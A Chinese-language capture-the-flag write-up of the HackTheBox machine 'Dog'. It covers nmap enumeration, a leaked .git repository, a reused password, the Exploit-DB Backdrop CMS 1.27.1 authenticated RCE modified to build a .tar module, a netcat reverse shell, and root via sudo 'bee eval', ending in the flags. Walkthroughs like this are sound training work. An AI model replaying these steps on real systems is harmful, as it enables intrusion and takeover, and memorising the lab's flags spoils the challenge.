Dog

Enumeration

nmap

第一次扫描发现系统对外开放了22、80端口，端口详细信息如下

┌──(kali㉿kali)-[~/Desktop/vegetable/HTB]
└─$ nmap -sC -sV -p 22,80 -oA nmap 10.10.11.58 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-26 03:36 EDT
Nmap scan report for 10.10.11.58
Host is up (2.3s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.93 seconds

TCP/80

浏览页面，在页面底部发现cms名称，backdrop

访问 nmap 扫描出的一些路径

在里面挑了一些有意思的，但没发现什么内容

Foothold

.git文件泄露

回到cms，在网上搜索发现了一处rce漏洞，但是需要认证

用目录扫描器扫描可能存在的其他路径，发现 .git

用githack.py工具还原并下载

┌──(kali㉿kali)-[~/Desktop/vegetable/GitHack]
└─$ python GitHack.py http://10.10.11.58/.git
[+] Download and parse index file ...
[+] LICENSE.txt
[+] README.md
[+] core/.jshintignore
[+] core/.jshintrc
[+] core/authorize.php
[+] core/cron.php
[+] core/includes/actions.inc
[+] core/includes/ajax.inc
[+] core/includes/anonymous.inc
[+] core/includes/archiver.inc

完成后，会出现一个以ip命名的文件夹

┌──(kali㉿kali)-[~/Desktop/vegetable/GitHack]
└─$ ls
10.10.11.58  GitHack.py  index  lib  README.md

在文件夹里找敏感信息时发现了mysql的用户名密码，考虑密码复用

grep -i "root" 10.10.11.58

但是ssh和web都无法登陆，想着看能不能暴力破解，但是响应太慢了，看了看其他wp发现可以用邮件名，这确实是一个思路，邮件中@前的名字很有可能是其他地方的用户名

┌──(kali㉿kali)-[~/Desktop/vegetable/GitHack]
└─$ grep -i "@dog.htb" 10.10.11.58 -r
10.10.11.58/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "tiffany@dog.htb"

BackDrop RCE

得到一个用户名，尝试登录tiffany:BackDropJ2024DS2024，成功登陆了，刚才看exploit database有漏洞，直接尝试利用

┌──(kali㉿kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ searchsploit backdrop               
------------------------------------------- ---------------------------------Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Backdrop CMS 1.20.0 - 'Multiple' Cross-Sit | php/webapps/50323.html
Backdrop CMS 1.23.0 - Stored XSS           | php/webapps/51905.txt
Backdrop CMS 1.27.1 - Authenticated Remote | php/webapps/52021.py
Backdrop Cms v1.25.1 - Stored Cross-Site S | php/webapps/51597.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results┌──(kali㉿kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ searchsploit -m php/webapps/52021.pyExploit: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)URL: https://www.exploit-db.com/exploits/52021Path: /usr/share/exploitdb/exploits/php/webapps/52021.pyCodes: N/AVerified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Desktop/vegetable/HTB/Dog/52021.py

直接运行python文件，先看看怎么运行，按照提示设置参数，然后就完成了，最后两行提示Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.考虑在这个路径下上传刚才生成的文件，如果上传成功在按照下一句提示Your shell address: http://10.10.11.58/modules/shell/shell.php，这个路径应该就能访问上传的shell，看起来挺简单

┌──(kali㉿kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ python 52021.py http://10.10.11.58
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php

但是第一步就出问题了，因为目录结构的一些问题，证实需要在下面的路径才能找到上传按钮

尝试上传shell.zip

却被温馨提示，只能上传固定格式的，这个倒好说

查看生成payloads的脚本，尝试修改一下脚本内容，将python代码里的zip全部改成tar，其余地方不变，然后按照刚才的方式重新生成文件，可以看到第五行提示已经变成创建了shell.tar

┌──(kali㉿kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ python exp.py http://10.10.11.58         
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.tar
Go to http://10.10.11.58/admin/modules/install and upload the shell.tar for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php

按照相同的方式上传 .tar 文件，显示成功

按照脚本提示信息访问下面的路径，发现成功

但是这个shell很快就会被清除，先找一个合适的反向shell，拼接好，然后重新上传 .tar 文件，快速访问拼接好的 url，这样在监听端可以获取到一个shell

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 1234                             
listening on [any] 1234 ...
connect to [10.10.16.59] from (UNKNOWN) [10.10.11.58] 57888
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dog:/var/www/html/modules/shell$ whoami
whoami
www-data

Privilege Escalation

目前的权限为 www-data，在 home 目录下发现了两个用户

www-data@dog:/var/www/html/modules/shell$ ls /home
jobert  johncusack

再次考虑密码复用，经过尝试发现可以用刚才的密码登录 johncusack，因为有密码，尝试查看 sudo -l 内容，找到了 bee

johncusack@dog:/tmp$ sudo -l
[sudo] password for johncusack: 
Matching Defaults entries for johncusack on dog:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser johncusack may run the following commands on dog:(ALL : ALL) /usr/local/bin/bee

看看怎么用，翻译一下

按照如下内容即可以root身份执行命令

johncusack@dog:~$ cd /var/www/html
johncusack@dog:/var/www/html$ 
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval "system('id');"
uid=0(root) gid=0(root) groups=0(root)
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval 'system("/bin/bash");'
root@dog:/var/www/html#
root@dog:/var/www/html# cat /home/johncusack/user.txt
7176e61dabe388fccd5a063ee57c616a
root@dog:/var/www/html# cat /root/root.txt
bd2e0207a6794f14909ddd58a1b836ea